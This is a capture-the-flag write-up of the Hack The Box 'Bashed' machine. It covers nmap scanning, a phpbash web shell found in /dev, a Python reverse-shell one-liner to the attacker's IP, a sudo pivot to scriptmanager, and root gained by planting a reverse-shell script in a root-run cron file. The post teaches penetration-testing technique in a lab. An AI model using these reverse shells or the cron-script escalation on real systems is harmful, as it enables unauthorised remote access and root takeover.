Redhalo

hack the box walkthrough – Bashed machine

Today new walkthrought about the hack the box machine Bashed.

It is an easy Linux machine released on dec. 2017 made by Arrexel.

Let’s jump it!

enumeration

As usual we start with a nmap enumeration to find out what we are dealing with today:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.66.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for 10.129.66.213
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds

It seems we have only an Apache web service running on port 80. Let’s have a look:

Seems a site talking about Arrexel’s dev progress. nothin interresting so far.

Let’s run a dirbuster scan to see if other pages can be found:

I found interresting files in dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!

I still prefer the shell with netcat:

nc -lvnp 1337
export RHOST="10.10.14.105";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

FOOTHOLD

Running a command sudo -l I found out I am able to run scriptmanager with sudo:

[email protected]:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

witht he following command I have been able to spaw a shell as scriptmanager:

[email protected]:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
[email protected]:/var/www/html/dev$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

PRIVILEGE ESCALATION

A linpeas enumeration output shows a uncommon folder “scripts” at the root

There are 2 files inside:

[email protected]:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager 1039 Dec 13 13:41 test.py
-rw-r--r--  1 root          root             8 Dec 13 15:00 test.txt
[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing123!")
f.close

[email protected]:/scripts$ cat test.txt
[email protected]:/scripts$ 

It appears that the python script is executing by root every minutes to edit the file test.txt

Therefor I edited the script for having a reverse shell

[email protected]:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing2")
f.close

import socket # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' 
    s.connect(('10.10.14.105', 4242)) # Here we define the Attacker IP and the listening port

    while True: # keep receiving commands from the Kali machine
        command = s.recv(1024) # read the first KB of the tcp socket

        if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop
            s.close()
            break 

        else: # otherwise, we pass the received command to a shell process

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( CMD.stdout.read() ) # send back the result
            s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error

def main ():
    connect()
main()

[email protected]:/scripts$ 
nc -lvnp 1337

Waiting 1 min… then I am root !

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.42.84] 58776
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)